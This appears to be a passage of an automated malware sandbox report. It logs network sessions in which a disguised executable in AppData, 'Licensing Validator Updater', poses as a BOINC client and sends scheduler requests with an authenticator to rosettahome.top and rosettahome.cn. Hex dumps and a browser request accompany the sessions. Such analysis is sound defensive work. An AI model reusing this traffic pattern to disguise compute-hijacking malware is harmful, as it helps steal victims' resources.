                                                                                                                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 UTC
                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 14 Jan 2025 19:46:34 UTC
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 1512
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 19 5d 73 d3 38 f0 bd bf 42 18 ee 5e 38 c7 49 e1 3e e8 39 61 7a a1 43 cb 94 36 d3 16 18 ee 25 a3 d8 1b 5b 45 b6 74 92 dc 90 fb f5 b7 92 ed c4 4e 93 52 38 33 25 d3 c4 96 b4 da ef 5d ad b6 e1 a3 57 e7 e3 ab 8f 93 23 92 9a 8c 8f f6 48 f5 09 ed 90 70 9a 27 43 0f 72 af b9 00 34 2e 87 eb b9 0c 0c 25 39 cd 60 e8 dd 30 58 48 a1 8c 47 22 91 1b c8 cd d0 5b b0 d8 a4 c3 18 6e 58 04 be 1b fc 42 58 ce 0c a3 dc d7 11 e5 30 1c 54 04 f6 c2 47 be 4f 42 1d a5 10 17 1c d4 28 35 46 1e 04 81 12 1a 8c a1 a9 c8 a0 67 84 6c 8e a7 51 c2 02 fc 86 c1 7a 17 f1 fd d1 5e c8 59 fe 89 28 e0 43 6f 26 58 1e 4d 57 eb 1e 49 15 cc 87 de fd 91 37 e5 37 cc 70 18 5d 1c 4d 4e 0f c7 47 e4 c3 c9 d5 31 99 5c 9c bf 39 1a 5f 91 b3 c3 b7 47 61 50 02 ec 6d 68 27 4a a9 42 bc 43 af 30 73 ff 0f 6f 43 83 0e ce 31 6c 96 12 b5 68 e0 b3 09 22 ad bd 52 00 6d 96 1c 74 0a 60 ee e0 3d ca 9b c3 20 98 09 61 b4 51 54 f6 32 96 f7 1c b2 0c 62 46 87 1e e5 bc 21 d1 5e 9b 01 4b 90 72 03 2a a7 06 2a 76 a8 94 9c 45 d4 30 81 34 b4 7e fa [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ]s8B^8I>9azC6%[EtNR83%]W#Hp'Cr4.%9`0XHG"[nXBX0TGOB(5FglQz^Y(Co&XMWI77p]MNG1\9_GaPmh'JBC0soC1lh"Rmt`= aQT2bF!^Kr**vE04~9qrK1D0($STlp&%p?<9?,-kgOZ"/~?v~$7@;t:8z`@As^;dYRC@Kkvq6`S*rpMz2FaNWDuF)~sZp9W/5KmpV#'$}L T4Ujz4_9:F70(EYL3E/]VP^6Zm,zhQ]JX,Zn.n7jkDkveGTa5|CF};}3~N;vV`4c<y`HVW/u1_r;0yhP7PS8nSAT8LuCu")GVK'H&b Z"O6oe1_V`|UdS[
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:34.085921049 CET646INData Raw: 26 40 66 82 aa b8 1b f3 18 a0 59 89 fc 0a df ba c1 29 95 98 33 0e 53 2b 79 89 7b 52 ce 74 83 de 86 ee b4 d4 8d 5c e7 21 3b 93 d5 d4 ba cd 4e 85 b6 b9 09 a8 8a d2 92 c0 3b 6d 33 93 9b e8 86 80 30 71 03 b3 98 13 93 02 ba e9 b2 9b f0 06 65 06 55 f0
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: &@fY)3S+y{Rt\!;N;m30qeU+?d]2tYh(F"i5bsqWuY*f=t,%yB|DFdn0@7_ZWbvbo96-r%N/ZdksHb5mg:h


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      6192.168.2.1649816104.238.61.8801276C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:40.853033066 CET6061OUTPOST /rosettahome_cgi/cgi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.top
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                      Content-type: text/xml
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 5860
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 73 63 68 65 64 75 6c 65 72 5f 72 65 71 75 65 73 74 3e 0a 20 20 20 20 3c 61 75 74 68 65 6e 74 69 63 61 74 6f 72 3e 31 5f 64 66 64 61 63 61 63 31 64 34 65 39 31 61 37 34 65 39 31 63 66 63 31 38 66 35 31 38 65 31 64 65 3c 2f 61 75 74 68 65 6e 74 69 63 61 74 6f 72 3e 0a 20 20 20 20 3c 68 6f 73 74 69 64 3e 30 3c 2f 68 6f 73 74 69 64 3e 0a 20 20 20 20 3c 72 70 63 5f 73 65 71 6e 6f 3e 30 3c 2f 72 70 63 5f 73 65 71 6e 6f 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 61 6a 6f 72 5f 76 65 72 73 69 6f 6e 3e 38 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 61 6a 6f 72 5f 76 65 72 73 69 6f 6e 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 69 6e 6f 72 5f 76 65 72 73 69 6f 6e 3e 30 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 69 6e 6f 72 5f 76 65 72 73 69 6f 6e 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 72 65 6c 65 61 73 65 3e 32 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 72 65 6c 65 61 73 65 3e 0a 20 20 20 20 3c 72 65 73 6f 75 72 63 65 5f 73 68 61 72 65 5f 66 72 61 63 74 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <scheduler_request> <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator> <hostid>0</hostid> <rpc_seqno>0</rpc_seqno> <core_client_major_version>8</core_client_major_version> <core_client_minor_version>0</core_client_minor_version> <core_client_release>2</core_client_release> <resource_share_fraction>1.000000</resource_share_fraction> <rrs_fraction>1.000000</rrs_fraction> <prrs_fraction>1.000000</prrs_fraction> <duration_correction_factor>1.000000</duration_correction_factor> <allow_multiple_clients>0</allow_multiple_clients> <sandbox>0</sandbox> <dont_send_work>0</dont_send_work> <work_req_seconds>1.000000</work_req_seconds> <cpu_req_secs>1.000000</cpu_req_secs> <cpu_req_instances>0.000000</cpu_req_instances> <estimated_delay>0.000000</estimated_delay> <client_cap_plan_class>1</client_cap_plan_class> <platform_name>windows_x86_64</platform_name> <alt_platform> <name>windows_intelx86</name> </al [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.473403931 CET1088INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:46:41 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 908
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 56 c9 8e e3 36 10 bd eb 2b 88 39 e4 d8 e2 a2 85 1c a8 95 43 ce 01 72 0a 90 93 40 91 c5 b6 d2 b2 a8 90 54 2f 7f 9f 92 2d b7 ed 71 9c 64 d2 a7 08 30 a0 da 58 ef 15 4b 55 6e a2 d9 81 5d 46 08 5d 80 79 7c 6f b3 e6 ac 79 81 10 07 3f b5 92 b2 26 bf 55 67 8d f5 53 ea 96 08 9d 35 2e 47 79 af 63 42 87 25 8c ed 2e a5 f9 6b 9e 07 1f 21 25 bd f3 7b 78 30 d3 a5 98 37 f9 85 7b d6 04 f8 63 81 98 3a 0b a3 7e 6f f9 03 3d 3c 4d 7e ad c7 1c 10 a3 7e 02 32 87 c1 87 21 bd 3f 7e 19 fd eb 97 f6 97 e0 7f 07 93 c8 4e 47 32 79 92 74 7c 8e 44 bf e8 61 d4 fd 08 98 eb 18 86 07 cc 47 cf 6e d2 7b 68 2f 00 35 f9 95 25 6b 26 78 4b 5d 98 cd 96 5a 50 fa 01 ea 1b 53 d6 60 11 c2 60 5b ac d3 f6 76 54 5d 25 49 48 e3 68 3f 65 38 bc 27 9f f4 d8 99 00 76 48 ed 39 c5 ad 6d f3 87 b7 59 bf 3c dd 09 b8 36 6e 11 28 61 f2 2e 0d 98 94 d5 4c 16 a5 52 54 6d 11 97 c6 ac 81 3d 56 ac c3 22 ee 5a b0 56 c9 de a8 be b6 ae 72 06 68 c5 a4 64 25 58 2a 84 ae a4 6e f2 0b e7 ac 31 c8 32 76 a7 12 62 05 78 6d a9 64 95 83 ba 2e 0b [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: V6+9Cr@T/-qd0XKUn]F]y|oy?&UgS5.GycB%.k!%{x07{c:~o=<M~~2!?~NG2yt|DaGn{h/5%k&xK]ZPS``[vT]%IHh?e8'vH9mY<6n(a.LRTm=V"ZVrhd%X*n12vbxmd.WRBXUAoU/T7!;bZ9(;ZSjNBpe^:cM:U_h7Y@TRtnY@wi{Q^d}mX]1BYiYW)e+@8jg\RB!(F(,b%-SFooo+j[^ &^rZ^N^R+WUsuYosYYUKQQnJ[B3kdU@d{P!Gq#2}[Cu4OfxC_`#C}X&sZO>,y@)Jb7'_uNawda8NL=%m_$_xa{Z?G;0f%=t`G`',c+;'}q8=InOk?%Yx-%p*p9(Jrk!;[9Vnp+'*_


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      7192.168.2.1649820104.238.61.8801276C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.241584063 CET206OUTGET /rosettahome/notices.php?userid=1&auth=1_1a362b2ad50985e203845fe44682096e HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.cn
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.827482939 CET505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:46:43 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                      Expires: Tue, 14 Jan 2025 19:46:43 GMT
                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 14 Jan 2025 19:46:43 GMT
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 232
                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/xml
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 65 50 db 6e c2 30 0c 7d df 57 58 7d 1e 84 96 32 41 55 82 80 55 03 34 2e 62 95 f6 1c a5 d6 1a 2d 38 a8 31 68 9f bf 0a 36 35 d3 fc 76 ec 73 b1 9d cf be 4e 16 ae d8 78 e3 68 1a c5 fd 41 04 48 da 55 86 3e a6 d1 fa 6d df 1b 8f 47 93 5e 1c c1 4c 3e c0 4f e5 8d f7 9d 26 69 35 c1 4c d7 8a 08 6d d0 61 c3 16 e5 b1 38 bc ce 97 05 bc af cb 15 1c 8e fb 4d b1 2c 61 37 df 16 40 8e 8d 46 9f 8b 3b b1 13 5a 43 9f b2 66 3e 67 42 34 ce 23 b3 aa dd 09 fb 9a 42 28 72 71 23 76 ba 0a bd 6e cc 99 db f5 e4 ee d7 3c 6c 06 11 ca f3 e2 62 6c f5 ac 18 65 79 c1 47 88 53 d8 28 82 64 90 8c 20 9e 64 e9 53 96 0e e1 65 5b b6 31 7f c8 37 93 ce 49 fc 3f 5c b4 7f ba c3 6f 83 96 3a d0 67 01 00 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ePn0}WX}2AUU4.b-81h65vsNxhAHU>mG^L>O&i5Lma8M,a7@F;ZCf>gB4#B(rq#vn<lbleyGS(d dSe[17I?\o:g
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.538058996 CET146OUTGET /rosettahome/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.cn
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.701327085 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:46:48 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 UTC
                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 14 Jan 2025 19:46:48 UTC
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 1512
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 19 5d 73 d3 38 f0 bd bf 42 18 ee 5e 38 c7 49 e1 3e e8 39 61 7a a1 43 cb 94 36 d3 16 18 ee 25 a3 d8 1b 5b 45 b6 74 92 dc 90 fb f5 b7 92 ed c4 4e 93 52 38 33 25 d3 c4 96 b4 da ef 5d ad b6 e1 a3 57 e7 e3 ab 8f 93 23 92 9a 8c 8f f6 48 f5 09 ed 90 70 9a 27 43 0f 72 af b9 00 34 2e 87 eb b9 0c 0c 25 39 cd 60 e8 dd 30 58 48 a1 8c 47 22 91 1b c8 cd d0 5b b0 d8 a4 c3 18 6e 58 04 be 1b fc 42 58 ce 0c a3 dc d7 11 e5 30 1c 54 04 f6 c2 47 be 4f 42 1d a5 10 17 1c d4 28 35 46 1e 04 81 12 1a 8c a1 a9 c8 a0 67 84 6c 8e a7 51 c2 02 fc 86 c1 7a 17 f1 fd d1 5e c8 59 fe 89 28 e0 43 6f 26 58 1e 4d 57 eb 1e 49 15 cc 87 de fd 91 37 e5 37 cc 70 18 5d 1c 4d 4e 0f c7 47 e4 c3 c9 d5 31 99 5c 9c bf 39 1a 5f 91 b3 c3 b7 47 61 50 02 ec 6d 68 27 4a a9 42 bc 43 af 30 73 ff 0f 6f 43 83 0e ce 31 6c 96 12 b5 68 e0 b3 09 22 ad bd 52 00 6d 96 1c 74 0a 60 ee e0 3d ca 9b c3 20 98 09 61 b4 51 54 f6 32 96 f7 1c b2 0c 62 46 87 1e e5 bc 21 d1 5e 9b 01 4b 90 72 03 2a a7 06 2a 76 a8 94 9c 45 d4 30 81 34 b4 7e fa [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ]s8B^8I>9azC6%[EtNR83%]W#Hp'Cr4.%9`0XHG"[nXBX0TGOB(5FglQz^Y(Co&XMWI77p]MNG1\9_GaPmh'JBC0soC1lh"Rmt`= aQT2bF!^Kr**vE04~9qrK1D0($STlp&%p?<9?,-kgOZ"/~?v~$7@;t:8z`@As^;dYRC@Kkvq6`S*rpMz2FaNWDuF)~sZp9W/5KmpV#'$}L T4Ujz4_9:F70(EYL3E/]VP^6Zm,zhQ]JX,Zn.n7jkDkveGTa5|CF};}3~N;vV`4c<y`HVW/u1_r;0yhP7PS8nSAT8LuCu")GVK'H&b Z"O6oe1_V`|UdS[
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.701350927 CET646INData Raw: 26 40 66 82 aa b8 1b f3 18 a0 59 89 fc 0a df ba c1 29 95 98 33 0e 53 2b 79 89 7b 52 ce 74 83 de 86 ee b4 d4 8d 5c e7 21 3b 93 d5 d4 ba cd 4e 85 b6 b9 09 a8 8a d2 92 c0 3b 6d 33 93 9b e8 86 80 30 71 03 b3 98 13 93 02 ba e9 b2 9b f0 06 65 06 55 f0
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: &@fY)3S+y{Rt\!;N;m30qeU+?d]2tYh(F"i5bsqWuY*f=t,%yB|DFdn0@7_ZWbvbo96-r%N/ZdksHb5mg:h


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      8192.168.2.1649822104.238.61.8801276C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.071654081 CET6731OUTPOST /rosettahome_cgi/cgi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.top
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                      Content-type: text/xml
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 6530
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 73 63 68 65 64 75 6c 65 72 5f 72 65 71 75 65 73 74 3e 0a 20 20 20 20 3c 61 75 74 68 65 6e 74 69 63 61 74 6f 72 3e 31 5f 64 66 64 61 63 61 63 31 64 34 65 39 31 61 37 34 65 39 31 63 66 63 31 38 66 35 31 38 65 31 64 65 3c 2f 61 75 74 68 65 6e 74 69 63 61 74 6f 72 3e 0a 20 20 20 20 3c 68 6f 73 74 69 64 3e 31 37 32 30 35 3c 2f 68 6f 73 74 69 64 3e 0a 20 20 20 20 3c 72 70 63 5f 73 65 71 6e 6f 3e 30 3c 2f 72 70 63 5f 73 65 71 6e 6f 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 61 6a 6f 72 5f 76 65 72 73 69 6f 6e 3e 38 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 61 6a 6f 72 5f 76 65 72 73 69 6f 6e 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 69 6e 6f 72 5f 76 65 72 73 69 6f 6e 3e 30 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 6d 69 6e 6f 72 5f 76 65 72 73 69 6f 6e 3e 0a 20 20 20 20 3c 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 72 65 6c 65 61 73 65 3e 32 3c 2f 63 6f 72 65 5f 63 6c 69 65 6e 74 5f 72 65 6c 65 61 73 65 3e 0a 20 20 20 20 3c 72 65 73 6f 75 72 63 65 5f 73 68 61 72 65 5f 66 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <scheduler_request> <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator> <hostid>17205</hostid> <rpc_seqno>0</rpc_seqno> <core_client_major_version>8</core_client_major_version> <core_client_minor_version>0</core_client_minor_version> <core_client_release>2</core_client_release> <resource_share_fraction>1.000000</resource_share_fraction> <rrs_fraction>1.000000</rrs_fraction> <prrs_fraction>1.000000</prrs_fraction> <duration_correction_factor>1.000000</duration_correction_factor> <allow_multiple_clients>0</allow_multiple_clients> <sandbox>0</sandbox> <dont_send_work>0</dont_send_work> <work_req_seconds>207360.000000</work_req_seconds> <cpu_req_secs>207360.000000</cpu_req_secs> <cpu_req_instances>4.000000</cpu_req_instances> <estimated_delay>0.000000</estimated_delay> <client_cap_plan_class>1</client_cap_plan_class> <platform_name>windows_x86_64</platform_name> <alt_platform> <name>windows_intelx86</ [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.831449986 CET871INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:46:56 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 691
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 55 b9 92 9c 30 10 cd f9 0a 95 03 87 8b 80 81 11 2e 2d 0e 1c bb ca 91 ab 1c 51 42 6a 16 bc 80 b0 24 e6 f8 7b 37 c7 ec c0 8e c7 d7 2a 52 5f 7a fd 9a ee 86 5b 59 81 1a 1a 30 b9 81 be 39 67 1e bf 6a 0e 60 6c ad bb 8c d1 80 fb b7 6a 8f 2b dd b9 7c b0 90 2b 59 fa 28 b7 c2 3a 74 18 4c 93 55 ce f5 1f 7c df 68 0b ce 89 4a b7 f0 20 bb b5 e8 73 7f e5 ee 71 03 3f 06 b0 2e 57 d0 88 73 16 3e d0 e9 70 7f ab 47 0c b0 56 3c 01 e9 4d ad 4d ed ce 8f ef 1a 7d 7c 97 7d 31 fa 3b 48 47 2a 61 49 a7 89 13 f6 d9 12 71 10 75 23 8a 06 10 6b 0e c3 07 fa d9 33 ef 44 0b d9 2a 21 ee 6f 2c 1e ef e0 e4 72 d3 cb 05 3a a2 f4 25 a9 57 26 8f 63 11 4c ad 32 ac d3 72 9b 55 1b 10 87 34 66 fb 05 61 ba 3b ed 44 93 4b 03 aa 76 d9 15 e2 d6 b6 f8 c3 a9 17 87 a7 3b 01 5b e3 12 81 12 82 e7 ae 46 d0 60 1f b0 5d 9c a6 34 5d 22 d6 46 8f 43 8b 15 cb b1 88 55 06 4a a5 ac 90 69 b1 57 65 52 4a a0 49 c0 58 10 83 a2 51 24 12 26 b8 bf 72 f6 b8 44 96 36 bf 94 10 2b 10 ee 15 65 41 52 c2 7e 1f ef ca 44 c5 2c 8e 22 95 26 50 a8 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: U0.-QBj${7*R_z[Y09gj`lj+|+Y(:tLU|hJ sq?.Ws>pGV<MM}|}1;HG*aIqu#k3D*!o,r:%W&cL2rU4fa;DKv;[F`]4]"FCUJiWeRJIXQ$&rD6+eAR~D,"&P7!F=eRF%e{A`RSbE"6+r^Ia\"-Xvtvn_q(l<q&yB,JSnO9"U`-A^^?u)/0=`R-5yM[1ZFb2sghp%#3XMtInM,DC<v8;8/>1Ey-5/?'iWK&^z@DIXB4e14UnX%;!ipDd7V0{O,


                                                                                                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      0192.168.2.1649710216.58.206.364436592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:09 UTC627OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:10 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:45:10 GMT
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0V9aejrY0FtcQ3dGJQ8yxA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:10 UTC124INData Raw: 33 33 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 6f 77 65 72 62 61 6c 6c 20 6c 6f 74 74 65 72 79 20 6e 75 6d 62 65 72 73 22 2c 22 6e 66 6c 20 6b 61 6e 73 61 73 20 63 69 74 79 20 63 68 69 65 66 73 22 2c 22 6c 69 6e 63 6f 6c 6e 20 77 68 65 61 74 20 70 65 6e 6e 79 20 72 61 72 65 20 63 6f 69 6e 22 2c 22 77 61 72 7a 6f 6e 65 20 75 70 64 61 74 65 20 70 61 74 63 68 20 6e 6f
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 338)]}'["",["powerball lottery numbers","nfl kansas city chiefs","lincoln wheat penny rare coin","warzone update patch no
